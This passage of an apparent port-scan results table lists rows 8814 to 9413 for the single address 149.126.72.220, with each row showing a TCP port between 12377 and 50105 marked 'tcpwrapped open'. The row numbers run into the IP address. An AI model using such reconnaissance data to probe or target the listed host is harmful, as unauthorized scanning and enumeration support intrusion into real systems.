8814149.126.72.220 12377 tcp tcpwrapped open
8815149.126.72.220 12378 tcp tcpwrapped open
8816149.126.72.220 12379 tcp tcpwrapped open
8817149.126.72.220 12380 tcp tcpwrapped open
8818149.126.72.220 12381 tcp tcpwrapped open
8819149.126.72.220 12382 tcp tcpwrapped open
8820149.126.72.220 12383 tcp tcpwrapped open
8821149.126.72.220 12384 tcp tcpwrapped open
8822149.126.72.220 12385 tcp tcpwrapped open
8823149.126.72.220 12386 tcp tcpwrapped open
8824149.126.72.220 12387 tcp tcpwrapped open
8825149.126.72.220 12388 tcp tcpwrapped open
8826149.126.72.220 12389 tcp tcpwrapped open
8827149.126.72.220 12390 tcp tcpwrapped open
8828149.126.72.220 12391 tcp tcpwrapped open
8829149.126.72.220 12392 tcp tcpwrapped open
8830149.126.72.220 12393 tcp tcpwrapped open
8831149.126.72.220 12394 tcp tcpwrapped open
8832149.126.72.220 12395 tcp tcpwrapped open
8833149.126.72.220 12396 tcp tcpwrapped open
8834149.126.72.220 12397 tcp tcpwrapped open
8835149.126.72.220 12398 tcp tcpwrapped open
8836149.126.72.220 12399 tcp tcpwrapped open
8837149.126.72.220 12400 tcp tcpwrapped open
8838149.126.72.220 12401 tcp tcpwrapped open
8839149.126.72.220 12402 tcp tcpwrapped open
8840149.126.72.220 12403 tcp tcpwrapped open
8841149.126.72.220 12404 tcp tcpwrapped open
8842149.126.72.220 12405 tcp tcpwrapped open
8843149.126.72.220 12406 tcp tcpwrapped open
8844149.126.72.220 12407 tcp tcpwrapped open
8845149.126.72.220 12408 tcp tcpwrapped open
8846149.126.72.220 12409 tcp tcpwrapped open
8847149.126.72.220 12410 tcp tcpwrapped open
8848149.126.72.220 12411 tcp tcpwrapped open
8849149.126.72.220 12412 tcp tcpwrapped open
8850149.126.72.220 12413 tcp tcpwrapped open
8851149.126.72.220 12414 tcp tcpwrapped open
8852149.126.72.220 12415 tcp tcpwrapped open
8853149.126.72.220 12416 tcp tcpwrapped open
8854149.126.72.220 12417 tcp tcpwrapped open
8855149.126.72.220 12418 tcp tcpwrapped open
8856149.126.72.220 12419 tcp tcpwrapped open
8857149.126.72.220 12420 tcp tcpwrapped open
8858149.126.72.220 12421 tcp tcpwrapped open
8859149.126.72.220 12422 tcp tcpwrapped open
8860149.126.72.220 12423 tcp tcpwrapped open
8861149.126.72.220 12424 tcp tcpwrapped open
8862149.126.72.220 12425 tcp tcpwrapped open
8863149.126.72.220 12426 tcp tcpwrapped open
8864149.126.72.220 12427 tcp tcpwrapped open
8865149.126.72.220 12428 tcp tcpwrapped open
8866149.126.72.220 12429 tcp tcpwrapped open
8867149.126.72.220 12430 tcp tcpwrapped open
8868149.126.72.220 12431 tcp tcpwrapped open
8869149.126.72.220 12432 tcp tcpwrapped open
8870149.126.72.220 12433 tcp tcpwrapped open
8871149.126.72.220 12434 tcp tcpwrapped open
8872149.126.72.220 12435 tcp tcpwrapped open
8873149.126.72.220 12436 tcp tcpwrapped open
8874149.126.72.220 12437 tcp tcpwrapped open
8875149.126.72.220 12438 tcp tcpwrapped open
8876149.126.72.220 12439 tcp tcpwrapped open
8877149.126.72.220 12440 tcp tcpwrapped open
8878149.126.72.220 12441 tcp tcpwrapped open
8879149.126.72.220 12442 tcp tcpwrapped open
8880149.126.72.220 12443 tcp tcpwrapped open
8881149.126.72.220 12444 tcp tcpwrapped open
8882149.126.72.220 12445 tcp tcpwrapped open
8883149.126.72.220 12446 tcp tcpwrapped open
8884149.126.72.220 12447 tcp tcpwrapped open
8885149.126.72.220 12448 tcp tcpwrapped open
8886149.126.72.220 12449 tcp tcpwrapped open
8887149.126.72.220 12450 tcp tcpwrapped open
8888149.126.72.220 12451 tcp tcpwrapped open
8889149.126.72.220 12452 tcp tcpwrapped open
8890149.126.72.220 12453 tcp tcpwrapped open
8891149.126.72.220 12454 tcp tcpwrapped open
8892149.126.72.220 12455 tcp tcpwrapped open
8893149.126.72.220 12456 tcp tcpwrapped open
8894149.126.72.220 12457 tcp tcpwrapped open
8895149.126.72.220 12458 tcp tcpwrapped open
8896149.126.72.220 12459 tcp tcpwrapped open
8897149.126.72.220 12460 tcp tcpwrapped open
8898149.126.72.220 12461 tcp tcpwrapped open
8899149.126.72.220 12462 tcp tcpwrapped open
8900149.126.72.220 12463 tcp tcpwrapped open
8901149.126.72.220 12464 tcp tcpwrapped open
8902149.126.72.220 12465 tcp tcpwrapped open
8903149.126.72.220 12466 tcp tcpwrapped open
8904149.126.72.220 12467 tcp tcpwrapped open
8905149.126.72.220 12468 tcp tcpwrapped open
8906149.126.72.220 12469 tcp tcpwrapped open
8907149.126.72.220 12470 tcp tcpwrapped open
8908149.126.72.220 12471 tcp tcpwrapped open
8909149.126.72.220 12472 tcp tcpwrapped open
8910149.126.72.220 12473 tcp tcpwrapped open
8911149.126.72.220 12474 tcp tcpwrapped open
8912149.126.72.220 12475 tcp tcpwrapped open
8913149.126.72.220 12476 tcp tcpwrapped open
8914149.126.72.220 12477 tcp tcpwrapped open
8915149.126.72.220 12478 tcp tcpwrapped open
8916149.126.72.220 12479 tcp tcpwrapped open
8917149.126.72.220 12480 tcp tcpwrapped open
8918149.126.72.220 12481 tcp tcpwrapped open
8919149.126.72.220 12482 tcp tcpwrapped open
8920149.126.72.220 12483 tcp tcpwrapped open
8921149.126.72.220 12484 tcp tcpwrapped open
8922149.126.72.220 12485 tcp tcpwrapped open
8923149.126.72.220 12486 tcp tcpwrapped open
8924149.126.72.220 12487 tcp tcpwrapped open
8925149.126.72.220 12488 tcp tcpwrapped open
8926149.126.72.220 12489 tcp tcpwrapped open
8927149.126.72.220 12490 tcp tcpwrapped open
8928149.126.72.220 12491 tcp tcpwrapped open
8929149.126.72.220 12492 tcp tcpwrapped open
8930149.126.72.220 12493 tcp tcpwrapped open
8931149.126.72.220 12494 tcp tcpwrapped open
8932149.126.72.220 12495 tcp tcpwrapped open
8933149.126.72.220 12496 tcp tcpwrapped open
8934149.126.72.220 12497 tcp tcpwrapped open
8935149.126.72.220 12498 tcp tcpwrapped open
8936149.126.72.220 12499 tcp tcpwrapped open
8937149.126.72.220 12500 tcp tcpwrapped open
8938149.126.72.220 12501 tcp tcpwrapped open
8939149.126.72.220 12502 tcp tcpwrapped open
8940149.126.72.220 12503 tcp tcpwrapped open
8941149.126.72.220 12504 tcp tcpwrapped open
8942149.126.72.220 12505 tcp tcpwrapped open
8943149.126.72.220 12506 tcp tcpwrapped open
8944149.126.72.220 12507 tcp tcpwrapped open
8945149.126.72.220 12508 tcp tcpwrapped open
8946149.126.72.220 12509 tcp tcpwrapped open
8947149.126.72.220 12510 tcp tcpwrapped open
8948149.126.72.220 12511 tcp tcpwrapped open
8949149.126.72.220 12512 tcp tcpwrapped open
8950149.126.72.220 12513 tcp tcpwrapped open
8951149.126.72.220 12514 tcp tcpwrapped open
8952149.126.72.220 12515 tcp tcpwrapped open
8953149.126.72.220 12516 tcp tcpwrapped open
8954149.126.72.220 12517 tcp tcpwrapped open
8955149.126.72.220 12518 tcp tcpwrapped open
8956149.126.72.220 12519 tcp tcpwrapped open
8957149.126.72.220 12520 tcp tcpwrapped open
8958149.126.72.220 12521 tcp tcpwrapped open
8959149.126.72.220 12522 tcp tcpwrapped open
8960149.126.72.220 12523 tcp tcpwrapped open
8961149.126.72.220 12524 tcp tcpwrapped open
8962149.126.72.220 12525 tcp tcpwrapped open
8963149.126.72.220 12526 tcp tcpwrapped open
8964149.126.72.220 12527 tcp tcpwrapped open
8965149.126.72.220 12528 tcp tcpwrapped open
8966149.126.72.220 12529 tcp tcpwrapped open
8967149.126.72.220 12530 tcp tcpwrapped open
8968149.126.72.220 12531 tcp tcpwrapped open
8969149.126.72.220 12532 tcp tcpwrapped open
8970149.126.72.220 12533 tcp tcpwrapped open
8971149.126.72.220 12534 tcp tcpwrapped open
8972149.126.72.220 12535 tcp tcpwrapped open
8973149.126.72.220 12536 tcp tcpwrapped open
8974149.126.72.220 12537 tcp tcpwrapped open
8975149.126.72.220 12538 tcp tcpwrapped open
8976149.126.72.220 12539 tcp tcpwrapped open
8977149.126.72.220 12540 tcp tcpwrapped open
8978149.126.72.220 12541 tcp tcpwrapped open
8979149.126.72.220 12542 tcp tcpwrapped open
8980149.126.72.220 12543 tcp tcpwrapped open
8981149.126.72.220 12544 tcp tcpwrapped open
8982149.126.72.220 12545 tcp tcpwrapped open
8983149.126.72.220 12546 tcp tcpwrapped open
8984149.126.72.220 12547 tcp tcpwrapped open
8985149.126.72.220 12548 tcp tcpwrapped open
8986149.126.72.220 12549 tcp tcpwrapped open
8987149.126.72.220 12550 tcp tcpwrapped open
8988149.126.72.220 12551 tcp tcpwrapped open
8989149.126.72.220 12552 tcp tcpwrapped open
8990149.126.72.220 12553 tcp tcpwrapped open
8991149.126.72.220 12554 tcp tcpwrapped open
8992149.126.72.220 12555 tcp tcpwrapped open
8993149.126.72.220 12556 tcp tcpwrapped open
8994149.126.72.220 12557 tcp tcpwrapped open
8995149.126.72.220 12558 tcp tcpwrapped open
8996149.126.72.220 12559 tcp tcpwrapped open
8997149.126.72.220 12560 tcp tcpwrapped open
8998149.126.72.220 12561 tcp tcpwrapped open
8999149.126.72.220 12562 tcp tcpwrapped open
9000149.126.72.220 12563 tcp tcpwrapped open
9001149.126.72.220 12564 tcp tcpwrapped open
9002149.126.72.220 12565 tcp tcpwrapped open
9003149.126.72.220 12566 tcp tcpwrapped open
9004149.126.72.220 12567 tcp tcpwrapped open
9005149.126.72.220 12568 tcp tcpwrapped open
9006149.126.72.220 12569 tcp tcpwrapped open
9007149.126.72.220 12570 tcp tcpwrapped open
9008149.126.72.220 12571 tcp tcpwrapped open
9009149.126.72.220 12572 tcp tcpwrapped open
9010149.126.72.220 12573 tcp tcpwrapped open
9011149.126.72.220 12574 tcp tcpwrapped open
9012149.126.72.220 12575 tcp tcpwrapped open
9013149.126.72.220 12576 tcp tcpwrapped open
9014149.126.72.220 12577 tcp tcpwrapped open
9015149.126.72.220 12578 tcp tcpwrapped open
9016149.126.72.220 12579 tcp tcpwrapped open
9017149.126.72.220 12580 tcp tcpwrapped open
9018149.126.72.220 12581 tcp tcpwrapped open
9019149.126.72.220 12582 tcp tcpwrapped open
9020149.126.72.220 12583 tcp tcpwrapped open
9021149.126.72.220 12584 tcp tcpwrapped open
9022149.126.72.220 12585 tcp tcpwrapped open
9023149.126.72.220 12586 tcp tcpwrapped open
9024149.126.72.220 12587 tcp tcpwrapped open
9025149.126.72.220 12588 tcp tcpwrapped open
9026149.126.72.220 12589 tcp tcpwrapped open
9027149.126.72.220 12590 tcp tcpwrapped open
9028149.126.72.220 13082 tcp tcpwrapped open
9029149.126.72.220 13084 tcp tcpwrapped open
9030149.126.72.220 13333 tcp tcpwrapped open
9031149.126.72.220 13443 tcp tcpwrapped open
9032149.126.72.220 14006 tcp tcpwrapped open
9033149.126.72.220 14082 tcp tcpwrapped open
9034149.126.72.220 14084 tcp tcpwrapped open
9035149.126.72.220 14104 tcp tcpwrapped open
9036149.126.72.220 14130 tcp tcpwrapped open
9037149.126.72.220 14182 tcp tcpwrapped open
9038149.126.72.220 14184 tcp tcpwrapped open
9039149.126.72.220 14330 tcp tcpwrapped open
9040149.126.72.220 14443 tcp tcpwrapped open
9041149.126.72.220 14825 tcp tcpwrapped open
9042149.126.72.220 15002 tcp tcpwrapped open
9043149.126.72.220 15006 tcp tcpwrapped open
9044149.126.72.220 15082 tcp tcpwrapped open
9045149.126.72.220 15084 tcp tcpwrapped open
9046149.126.72.220 15151 tcp tcpwrapped open
9047149.126.72.220 15555 tcp tcpwrapped open
9048149.126.72.220 16000 tcp tcpwrapped open
9049149.126.72.220 16001 tcp tcpwrapped open
9050149.126.72.220 16015 tcp tcpwrapped open
9051149.126.72.220 16016 tcp tcpwrapped open
9052149.126.72.220 16017 tcp tcpwrapped open
9053149.126.72.220 16082 tcp tcpwrapped open
9054149.126.72.220 16084 tcp tcpwrapped open
9055149.126.72.220 16311 tcp tcpwrapped open
9056149.126.72.220 16316 tcp tcpwrapped open
9057149.126.72.220 16443 tcp tcpwrapped open
9058149.126.72.220 16800 tcp tcpwrapped open
9059149.126.72.220 16888 tcp tcpwrapped open
9060149.126.72.220 17082 tcp tcpwrapped open
9061149.126.72.220 17084 tcp tcpwrapped open
9062149.126.72.220 17182 tcp tcpwrapped open
9063149.126.72.220 17184 tcp tcpwrapped open
9064149.126.72.220 17770 tcp tcpwrapped open
9065149.126.72.220 17771 tcp tcpwrapped open
9066149.126.72.220 17772 tcp tcpwrapped open
9067149.126.72.220 17773 tcp tcpwrapped open
9068149.126.72.220 17774 tcp tcpwrapped open
9069149.126.72.220 17775 tcp tcpwrapped open
9070149.126.72.220 17776 tcp tcpwrapped open
9071149.126.72.220 17777 tcp tcpwrapped open
9072149.126.72.220 17778 tcp tcpwrapped open
9073149.126.72.220 17779 tcp tcpwrapped open
9074149.126.72.220 17780 tcp tcpwrapped open
9075149.126.72.220 18000 tcp tcpwrapped open
9076149.126.72.220 18001 tcp tcpwrapped open
9077149.126.72.220 18002 tcp tcpwrapped open
9078149.126.72.220 18003 tcp tcpwrapped open
9079149.126.72.220 18004 tcp tcpwrapped open
9080149.126.72.220 18005 tcp tcpwrapped open
9081149.126.72.220 18006 tcp tcpwrapped open
9082149.126.72.220 18007 tcp tcpwrapped open
9083149.126.72.220 18008 tcp tcpwrapped open
9084149.126.72.220 18009 tcp tcpwrapped open
9085149.126.72.220 18010 tcp tcpwrapped open
9086149.126.72.220 18011 tcp tcpwrapped open
9087149.126.72.220 18012 tcp tcpwrapped open
9088149.126.72.220 18013 tcp tcpwrapped open
9089149.126.72.220 18014 tcp tcpwrapped open
9090149.126.72.220 18015 tcp tcpwrapped open
9091149.126.72.220 18016 tcp tcpwrapped open
9092149.126.72.220 18017 tcp tcpwrapped open
9093149.126.72.220 18018 tcp tcpwrapped open
9094149.126.72.220 18019 tcp tcpwrapped open
9095149.126.72.220 18020 tcp tcpwrapped open
9096149.126.72.220 18021 tcp tcpwrapped open
9097149.126.72.220 18022 tcp tcpwrapped open
9098149.126.72.220 18023 tcp tcpwrapped open
9099149.126.72.220 18024 tcp tcpwrapped open
9100149.126.72.220 18025 tcp tcpwrapped open
9101149.126.72.220 18026 tcp tcpwrapped open
9102149.126.72.220 18027 tcp tcpwrapped open
9103149.126.72.220 18028 tcp tcpwrapped open
9104149.126.72.220 18029 tcp tcpwrapped open
9105149.126.72.220 18030 tcp tcpwrapped open
9106149.126.72.220 18031 tcp tcpwrapped open
9107149.126.72.220 18032 tcp tcpwrapped open
9108149.126.72.220 18033 tcp tcpwrapped open
9109149.126.72.220 18034 tcp tcpwrapped open
9110149.126.72.220 18035 tcp tcpwrapped open
9111149.126.72.220 18036 tcp tcpwrapped open
9112149.126.72.220 18037 tcp tcpwrapped open
9113149.126.72.220 18038 tcp tcpwrapped open
9114149.126.72.220 18039 tcp tcpwrapped open
9115149.126.72.220 18040 tcp tcpwrapped open
9116149.126.72.220 18041 tcp tcpwrapped open
9117149.126.72.220 18042 tcp tcpwrapped open
9118149.126.72.220 18043 tcp tcpwrapped open
9119149.126.72.220 18044 tcp tcpwrapped open
9120149.126.72.220 18045 tcp tcpwrapped open
9121149.126.72.220 18046 tcp tcpwrapped open
9122149.126.72.220 18047 tcp tcpwrapped open
9123149.126.72.220 18048 tcp tcpwrapped open
9124149.126.72.220 18049 tcp tcpwrapped open
9125149.126.72.220 18050 tcp tcpwrapped open
9126149.126.72.220 18051 tcp tcpwrapped open
9127149.126.72.220 18052 tcp tcpwrapped open
9128149.126.72.220 18053 tcp tcpwrapped open
9129149.126.72.220 18054 tcp tcpwrapped open
9130149.126.72.220 18055 tcp tcpwrapped open
9131149.126.72.220 18056 tcp tcpwrapped open
9132149.126.72.220 18057 tcp tcpwrapped open
9133149.126.72.220 18058 tcp tcpwrapped open
9134149.126.72.220 18059 tcp tcpwrapped open
9135149.126.72.220 18060 tcp tcpwrapped open
9136149.126.72.220 18061 tcp tcpwrapped open
9137149.126.72.220 18062 tcp tcpwrapped open
9138149.126.72.220 18063 tcp tcpwrapped open
9139149.126.72.220 18064 tcp tcpwrapped open
9140149.126.72.220 18065 tcp tcpwrapped open
9141149.126.72.220 18066 tcp tcpwrapped open
9142149.126.72.220 18067 tcp tcpwrapped open
9143149.126.72.220 18068 tcp tcpwrapped open
9144149.126.72.220 18069 tcp tcpwrapped open
9145149.126.72.220 18070 tcp tcpwrapped open
9146149.126.72.220 18071 tcp tcpwrapped open
9147149.126.72.220 18072 tcp tcpwrapped open
9148149.126.72.220 18073 tcp tcpwrapped open
9149149.126.72.220 18074 tcp tcpwrapped open
9150149.126.72.220 18075 tcp tcpwrapped open
9151149.126.72.220 18076 tcp tcpwrapped open
9152149.126.72.220 18077 tcp tcpwrapped open
9153149.126.72.220 18078 tcp tcpwrapped open
9154149.126.72.220 18079 tcp tcpwrapped open
9155149.126.72.220 18080 tcp tcpwrapped open
9156149.126.72.220 18081 tcp tcpwrapped open
9157149.126.72.220 18082 tcp tcpwrapped open
9158149.126.72.220 18083 tcp tcpwrapped open
9159149.126.72.220 18084 tcp tcpwrapped open
9160149.126.72.220 18085 tcp tcpwrapped open
9161149.126.72.220 18086 tcp tcpwrapped open
9162149.126.72.220 18087 tcp tcpwrapped open
9163149.126.72.220 18088 tcp tcpwrapped open
9164149.126.72.220 18089 tcp tcpwrapped open
9165149.126.72.220 18090 tcp tcpwrapped open
9166149.126.72.220 18091 tcp tcpwrapped open
9167149.126.72.220 18092 tcp tcpwrapped open
9168149.126.72.220 18093 tcp tcpwrapped open
9169149.126.72.220 18094 tcp tcpwrapped open
9170149.126.72.220 18095 tcp tcpwrapped open
9171149.126.72.220 18096 tcp tcpwrapped open
9172149.126.72.220 18097 tcp tcpwrapped open
9173149.126.72.220 18098 tcp tcpwrapped open
9174149.126.72.220 18099 tcp tcpwrapped open
9175149.126.72.220 18100 tcp tcpwrapped open
9176149.126.72.220 18101 tcp tcpwrapped open
9177149.126.72.220 18102 tcp tcpwrapped open
9178149.126.72.220 18103 tcp tcpwrapped open
9179149.126.72.220 18104 tcp tcpwrapped open
9180149.126.72.220 18105 tcp tcpwrapped open
9181149.126.72.220 18106 tcp tcpwrapped open
9182149.126.72.220 18107 tcp tcpwrapped open
9183149.126.72.220 18108 tcp tcpwrapped open
9184149.126.72.220 18109 tcp tcpwrapped open
9185149.126.72.220 18110 tcp tcpwrapped open
9186149.126.72.220 18111 tcp tcpwrapped open
9187149.126.72.220 18112 tcp tcpwrapped open
9188149.126.72.220 18113 tcp tcpwrapped open
9189149.126.72.220 18200 tcp tcpwrapped open
9190149.126.72.220 18239 tcp tcpwrapped open
9191149.126.72.220 18443 tcp tcpwrapped open
9192149.126.72.220 18802 tcp tcpwrapped open
9193149.126.72.220 19013 tcp tcpwrapped open
9194149.126.72.220 19014 tcp tcpwrapped open
9195149.126.72.220 19015 tcp tcpwrapped open
9196149.126.72.220 19016 tcp tcpwrapped open
9197149.126.72.220 19017 tcp tcpwrapped open
9198149.126.72.220 19022 tcp tcpwrapped open
9199149.126.72.220 19080 tcp tcpwrapped open
9200149.126.72.220 19082 tcp tcpwrapped open
9201149.126.72.220 19084 tcp tcpwrapped open
9202149.126.72.220 19443 tcp tcpwrapped open
9203149.126.72.220 20000 tcp tcpwrapped open
9204149.126.72.220 20001 tcp tcpwrapped open
9205149.126.72.220 20010 tcp tcpwrapped open
9206149.126.72.220 20020 tcp tcpwrapped open
9207149.126.72.220 20030 tcp tcpwrapped open
9208149.126.72.220 20040 tcp tcpwrapped open
9209149.126.72.220 20050 tcp tcpwrapped open
9210149.126.72.220 20053 tcp tcpwrapped open
9211149.126.72.220 20060 tcp tcpwrapped open
9212149.126.72.220 20070 tcp tcpwrapped open
9213149.126.72.220 20080 tcp tcpwrapped open
9214149.126.72.220 20082 tcp tcpwrapped open
9215149.126.72.220 20084 tcp tcpwrapped open
9216149.126.72.220 20090 tcp tcpwrapped open
9217149.126.72.220 20100 tcp tcpwrapped open
9218149.126.72.220 20106 tcp tcpwrapped open
9219149.126.72.220 20107 tcp tcpwrapped open
9220149.126.72.220 20110 tcp tcpwrapped open
9221149.126.72.220 20150 tcp tcpwrapped open
9222149.126.72.220 20182 tcp tcpwrapped open
9223149.126.72.220 20184 tcp tcpwrapped open
9224149.126.72.220 20185 tcp tcpwrapped open
9225149.126.72.220 20200 tcp tcpwrapped open
9226149.126.72.220 20208 tcp tcpwrapped open
9227149.126.72.220 20325 tcp tcpwrapped open
9228149.126.72.220 20500 tcp tcpwrapped open
9229149.126.72.220 20512 tcp tcpwrapped open
9230149.126.72.220 20600 tcp tcpwrapped open
9231149.126.72.220 20800 tcp tcpwrapped open
9232149.126.72.220 20892 tcp tcpwrapped open
9233149.126.72.220 20894 tcp tcpwrapped open
9234149.126.72.220 20900 tcp tcpwrapped open
9235149.126.72.220 21081 tcp tcpwrapped open
9236149.126.72.220 21082 tcp tcpwrapped open
9237149.126.72.220 21083 tcp tcpwrapped open
9238149.126.72.220 21084 tcp tcpwrapped open
9239149.126.72.220 21100 tcp tcpwrapped open
9240149.126.72.220 21200 tcp tcpwrapped open
9241149.126.72.220 21300 tcp tcpwrapped open
9242149.126.72.220 21357 tcp tcpwrapped open
9243149.126.72.220 21381 tcp tcpwrapped open
9244149.126.72.220 21400 tcp tcpwrapped open
9245149.126.72.220 21500 tcp tcpwrapped open
9246149.126.72.220 21935 tcp tcpwrapped open
9247149.126.72.220 22082 tcp tcpwrapped open
9248149.126.72.220 22084 tcp tcpwrapped open
9249149.126.72.220 22103 tcp tcpwrapped open
9250149.126.72.220 22107 tcp tcpwrapped open
9251149.126.72.220 22206 tcp tcpwrapped open
9252149.126.72.220 22345 tcp tcpwrapped open
9253149.126.72.220 22403 tcp tcpwrapped open
9254149.126.72.220 22609 tcp tcpwrapped open
9255149.126.72.220 22703 tcp tcpwrapped open
9256149.126.72.220 22705 tcp tcpwrapped open
9257149.126.72.220 23082 tcp tcpwrapped open
9258149.126.72.220 23084 tcp tcpwrapped open
9259149.126.72.220 23182 tcp tcpwrapped open
9260149.126.72.220 23184 tcp tcpwrapped open
9261149.126.72.220 24082 tcp tcpwrapped open
9262149.126.72.220 24084 tcp tcpwrapped open
9263149.126.72.220 24472 tcp tcpwrapped open
9264149.126.72.220 24510 tcp tcpwrapped open
9265149.126.72.220 25000 tcp tcpwrapped open
9266149.126.72.220 25001 tcp tcpwrapped open
9267149.126.72.220 25002 tcp tcpwrapped open
9268149.126.72.220 25003 tcp tcpwrapped open
9269149.126.72.220 25004 tcp tcpwrapped open
9270149.126.72.220 25005 tcp tcpwrapped open
9271149.126.72.220 25006 tcp tcpwrapped open
9272149.126.72.220 25007 tcp tcpwrapped open
9273149.126.72.220 25008 tcp tcpwrapped open
9274149.126.72.220 25009 tcp tcpwrapped open
9275149.126.72.220 25010 tcp tcpwrapped open
9276149.126.72.220 25082 tcp tcpwrapped open
9277149.126.72.220 25084 tcp tcpwrapped open
9278149.126.72.220 25782 tcp tcpwrapped open
9279149.126.72.220 25952 tcp tcpwrapped open
9280149.126.72.220 27571 tcp tcpwrapped open
9281149.126.72.220 28001 tcp tcpwrapped open
9282149.126.72.220 28080 tcp tcpwrapped open
9283149.126.72.220 28818 tcp tcpwrapped open
9284149.126.72.220 29798 tcp tcpwrapped open
9285149.126.72.220 29799 tcp tcpwrapped open
9286149.126.72.220 30000 tcp tcpwrapped open
9287149.126.72.220 30001 tcp tcpwrapped open
9288149.126.72.220 30003 tcp tcpwrapped open
9289149.126.72.220 30005 tcp tcpwrapped open
9290149.126.72.220 30007 tcp tcpwrapped open
9291149.126.72.220 30009 tcp tcpwrapped open
9292149.126.72.220 30011 tcp tcpwrapped open
9293149.126.72.220 30013 tcp tcpwrapped open
9294149.126.72.220 30015 tcp tcpwrapped open
9295149.126.72.220 30017 tcp tcpwrapped open
9296149.126.72.220 30019 tcp tcpwrapped open
9297149.126.72.220 30021 tcp tcpwrapped open
9298149.126.72.220 30050 tcp tcpwrapped open
9299149.126.72.220 30106 tcp tcpwrapped open
9300149.126.72.220 30110 tcp tcpwrapped open
9301149.126.72.220 30111 tcp tcpwrapped open
9302149.126.72.220 30112 tcp tcpwrapped open
9303149.126.72.220 30113 tcp tcpwrapped open
9304149.126.72.220 30120 tcp tcpwrapped open
9305149.126.72.220 30121 tcp tcpwrapped open
9306149.126.72.220 30122 tcp tcpwrapped open
9307149.126.72.220 30123 tcp tcpwrapped open
9308149.126.72.220 30452 tcp tcpwrapped open
9309149.126.72.220 30468 tcp tcpwrapped open
9310149.126.72.220 30473 tcp tcpwrapped open
9311149.126.72.220 30479 tcp tcpwrapped open
9312149.126.72.220 30501 tcp tcpwrapped open
9313149.126.72.220 30700 tcp tcpwrapped open
9314149.126.72.220 30701 tcp tcpwrapped open
9315149.126.72.220 30892 tcp tcpwrapped open
9316149.126.72.220 30894 tcp tcpwrapped open
9317149.126.72.220 31337 tcp tcpwrapped open
9318149.126.72.220 32101 tcp tcpwrapped open
9319149.126.72.220 32102 tcp tcpwrapped open
9320149.126.72.220 32202 tcp tcpwrapped open
9321149.126.72.220 32303 tcp tcpwrapped open
9322149.126.72.220 32443 tcp tcpwrapped open
9323149.126.72.220 32444 tcp tcpwrapped open
9324149.126.72.220 32746 tcp tcpwrapped open
9325149.126.72.220 32800 tcp tcpwrapped open
9326149.126.72.220 34225 tcp tcpwrapped open
9327149.126.72.220 34500 tcp tcpwrapped open
9328149.126.72.220 35522 tcp tcpwrapped open
9329149.126.72.220 35524 tcp tcpwrapped open
9330149.126.72.220 35531 tcp tcpwrapped open
9331149.126.72.220 35554 tcp tcpwrapped open
9332149.126.72.220 35559 tcp tcpwrapped open
9333149.126.72.220 35560 tcp tcpwrapped open
9334149.126.72.220 36982 tcp tcpwrapped open
9335149.126.72.220 36983 tcp tcpwrapped open
9336149.126.72.220 36984 tcp tcpwrapped open
9337149.126.72.220 37080 tcp tcpwrapped open
9338149.126.72.220 38880 tcp tcpwrapped open
9339149.126.72.220 39001 tcp tcpwrapped open
9340149.126.72.220 40070 tcp tcpwrapped open
9341149.126.72.220 40099 tcp tcpwrapped open
9342149.126.72.220 40892 tcp tcpwrapped open
9343149.126.72.220 40894 tcp tcpwrapped open
9344149.126.72.220 42208 tcp tcpwrapped open
9345149.126.72.220 42424 tcp tcpwrapped open
9346149.126.72.220 42901 tcp tcpwrapped open
9347149.126.72.220 43008 tcp tcpwrapped open
9348149.126.72.220 43009 tcp tcpwrapped open
9349149.126.72.220 43200 tcp tcpwrapped open
9350149.126.72.220 44100 tcp tcpwrapped open
9351149.126.72.220 44300 tcp tcpwrapped open
9352149.126.72.220 44301 tcp tcpwrapped open
9353149.126.72.220 44302 tcp tcpwrapped open
9354149.126.72.220 44303 tcp tcpwrapped open
9355149.126.72.220 44304 tcp tcpwrapped open
9356149.126.72.220 44305 tcp tcpwrapped open
9357149.126.72.220 44306 tcp tcpwrapped open
9358149.126.72.220 44307 tcp tcpwrapped open
9359149.126.72.220 44308 tcp tcpwrapped open
9360149.126.72.220 44309 tcp tcpwrapped open
9361149.126.72.220 44310 tcp tcpwrapped open
9362149.126.72.220 44320 tcp tcpwrapped open
9363149.126.72.220 44332 tcp tcpwrapped open
9364149.126.72.220 44333 tcp tcpwrapped open
9365149.126.72.220 44334 tcp tcpwrapped open
9366149.126.72.220 44336 tcp tcpwrapped open
9367149.126.72.220 44337 tcp tcpwrapped open
9368149.126.72.220 44340 tcp tcpwrapped open
9369149.126.72.220 44341 tcp tcpwrapped open
9370149.126.72.220 44345 tcp tcpwrapped open
9371149.126.72.220 44400 tcp tcpwrapped open
9372149.126.72.220 44410 tcp tcpwrapped open
9373149.126.72.220 44420 tcp tcpwrapped open
9374149.126.72.220 45000 tcp tcpwrapped open
9375149.126.72.220 45555 tcp tcpwrapped open
9376149.126.72.220 45666 tcp tcpwrapped open
9377149.126.72.220 45667 tcp tcpwrapped open
9378149.126.72.220 45668 tcp tcpwrapped open
9379149.126.72.220 45677 tcp tcpwrapped open
9380149.126.72.220 45777 tcp tcpwrapped open
9381149.126.72.220 45788 tcp tcpwrapped open
9382149.126.72.220 45821 tcp tcpwrapped open
9383149.126.72.220 45886 tcp tcpwrapped open
9384149.126.72.220 45888 tcp tcpwrapped open
9385149.126.72.220 46000 tcp tcpwrapped open
9386149.126.72.220 46443 tcp tcpwrapped open
9387149.126.72.220 46862 tcp tcpwrapped open
9388149.126.72.220 47000 tcp tcpwrapped open
9389149.126.72.220 47080 tcp tcpwrapped open
9390149.126.72.220 47534 tcp tcpwrapped open
9391149.126.72.220 48888 tcp tcpwrapped open
9392149.126.72.220 48889 tcp tcpwrapped open
9393149.126.72.220 49200 tcp tcpwrapped open
9394149.126.72.220 49210 tcp tcpwrapped open
9395149.126.72.220 49443 tcp tcpwrapped open
9396149.126.72.220 49682 tcp tcpwrapped open
9397149.126.72.220 49684 tcp tcpwrapped open
9398149.126.72.220 49686 tcp tcpwrapped open
9399149.126.72.220 49688 tcp tcpwrapped open
9400149.126.72.220 49690 tcp tcpwrapped open
9401149.126.72.220 49692 tcp tcpwrapped open
9402149.126.72.220 49694 tcp tcpwrapped open
9403149.126.72.220 50000 tcp tcpwrapped open
9404149.126.72.220 50001 tcp tcpwrapped open
9405149.126.72.220 50042 tcp tcpwrapped open
9406149.126.72.220 50050 tcp tcpwrapped open
9407149.126.72.220 50073 tcp tcpwrapped open
9408149.126.72.220 50085 tcp tcpwrapped open
9409149.126.72.220 50101 tcp tcpwrapped open
9410149.126.72.220 50102 tcp tcpwrapped open
9411149.126.72.220 50103 tcp tcpwrapped open
9412149.126.72.220 50104 tcp tcpwrapped open
9413149.126.72.220 50105 tcp tcpwrapped open
